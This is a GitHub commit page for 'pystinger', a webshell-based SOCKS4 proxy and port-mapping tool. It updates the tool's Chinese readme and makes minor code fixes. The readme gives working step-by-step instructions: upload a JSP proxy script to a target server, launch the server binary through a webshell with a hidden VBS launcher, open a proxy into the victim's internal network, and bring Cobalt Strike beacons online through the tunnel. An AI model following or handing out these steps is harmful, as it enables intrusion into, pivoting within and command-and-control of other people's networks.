Skip to content

Commit a77bc3b

Browse files
author
zhaochengyu
committed
更新readme
1 parent 7cc1581 commit a77bc3b

File tree

3 files changed

+40
-23
lines changed

3 files changed

+40
-23
lines changed

readme.md

+26-13
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,20 @@
1-
# 毒刺(pystinger_for_darkshadow)
2-
毒刺(pystinger_for_darkshadow)是一个通过webshell实现**内网SOCK4代理**,**端口映射**.工具主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
1+
# 毒刺(pystinger)
2+
3+
毒刺(pystinger)通过webshell实现**内网SOCK4代理**,**端口映射**.
4+
5+
可直接用于metasploit-framework,viper,cobalt strike上线
6+
7+
主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
8+
39
# 使用方法
410

511
## SOCK4代理
6-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
12+
13+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
714
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
8-
(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
9-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
15+
> 修改vbs中exe路径,不要直接运行exe文件,会导致tcp断连
16+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
17+
* 如下输出表示成功
1018
```
1119
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
1220
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -37,10 +45,12 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
3745
* 此时已经在本地60000启动了一个192.168.3.11所在内网的socks4代理
3846

3947
## cobalt strike单主机上线
40-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
48+
49+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
4150
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
42-
(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
43-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
51+
> 修改vbs中路径,不要直接运行exe文件,会导致tcp断连
52+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
53+
* 如下输出表示成功
4454
```
4555
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
4656
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -67,20 +77,23 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
6777
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
6878
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
6979
```
70-
* cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
80+
* cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
7181
* 生成payload,上传到主机运行后即可上线
7282

7383
## cobalt strike多主机上线
74-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
84+
85+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
7586
* 将stinger_server.exe上传到目标服务器
7687
* 修改stinger_server.vbs,示例如下:
7788
```
7889
Set ws = CreateObject("Wscript.Shell")
7990
ws.run "cmd /c D:\XXXXX\stinger_server.exe 192.168.3.11",vbhide
8091
```
81-
(192.168.3.11可以改成0.0.0.0)
82-
*蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
83-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
92+
> 192.168.3.11可以改成0.0.0.0
93+
94+
* 蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
95+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
96+
* 如下输出表示成功
8497
```
8598
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
8699
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...

stinger_client.py

+2-3
Original file line numberDiff line numberDiff line change
@@ -55,7 +55,7 @@ def __init__(self):
5555
# }
5656
# socket参数
5757
self.LOCAL_ADDR = None
58-
self.READ_BUFF_SIZE = 51200
58+
self.READ_BUFF_SIZE = 11200
5959
# 日志参数
6060
self.LOG_LEVEL = "INFO"
6161
self.logger = get_logger(level=self.LOG_LEVEL, name="StreamLogger")
@@ -102,9 +102,8 @@ def _post_data(self, url, data={}):
102102
else:
103103
return web_return_data
104104
except Exception as E:
105-
106105
self.logger.warning("WEBSHELL return wrong data")
107-
self.logger.warning(r.content)
106+
self.logger.debug(r.content)
108107
return None
109108

110109
def run(self):

stinger_server.pyw

+12-7
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ try:
1414
except Exception as E:
1515
from SocketServer import BaseRequestHandler
1616
from SocketServer import ThreadingTCPServer
17-
17+
import os
1818
import threading
1919
import time
2020
from socket import AF_INET, SOCK_STREAM
@@ -308,7 +308,8 @@ class ControlCenter(threading.Thread):
308308
client_address_one_data = mirror_post_send_data.get(mirror_client_address)
309309

310310
if serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address) is None:
311-
serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
311+
serverGlobal.logger.warning(
312+
"MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
312313
continue
313314
else:
314315
server_socket_conn = serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
@@ -332,12 +333,13 @@ class ControlCenter(threading.Thread):
332333
if len(tcp_send_data) > 0:
333334
serverGlobal.logger.info(
334335
"MIRROR_CLIENT_ADDRESS:{} CLIENT_TCP_SEND_LEN:{}".format(mirror_client_address,
335-
len(tcp_send_data)))
336+
len(tcp_send_data)))
336337

337338
send_flag = True
338339
break
339340
except Exception as E: # socket 已失效
340-
serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
341+
serverGlobal.logger.warning(
342+
"MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
341343
serverGlobal.logger.exception(E)
342344

343345
if send_flag is not True:
@@ -362,7 +364,7 @@ class ControlCenter(threading.Thread):
362364
if len(tcp_recv_data) > 0:
363365
serverGlobal.logger.info(
364366
"MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_RECV_LEN:{}".format(mirror_client_address,
365-
len(tcp_recv_data)))
367+
len(tcp_recv_data)))
366368
revc_flag = True
367369
break
368370
except Exception as err:
@@ -380,6 +382,9 @@ class ControlCenter(threading.Thread):
380382
if __name__ == '__main__':
381383

382384
if len(sys.argv) > 1:
385+
if sys.argv[1] == "check":
386+
print(os.path.dirname(os.path.realpath(sys.argv[0])))
387+
sys.exit(1)
383388
listenip = sys.argv[1]
384389
else:
385390
listenip = LOCALADDR
@@ -394,7 +399,7 @@ if __name__ == '__main__':
394399
break
395400
if SERVER_LISTEN is None:
396401
print("[x] There is no available control server port")
397-
exit(1)
402+
sys.exit(1)
398403

399404
MIRROR_LISTEN = None
400405
for port in MIRROR_PORT:
@@ -405,7 +410,7 @@ if __name__ == '__main__':
405410
break
406411
if MIRROR_LISTEN is None:
407412
print("[x] There is no available mirror server port")
408-
exit(1)
413+
sys.exit(1)
409414

410415
serverGlobal = ServerGlobal()
411416
serverGlobal.SERVER_LISTEN = SERVER_LISTEN

0 commit comments

Comments
 (0)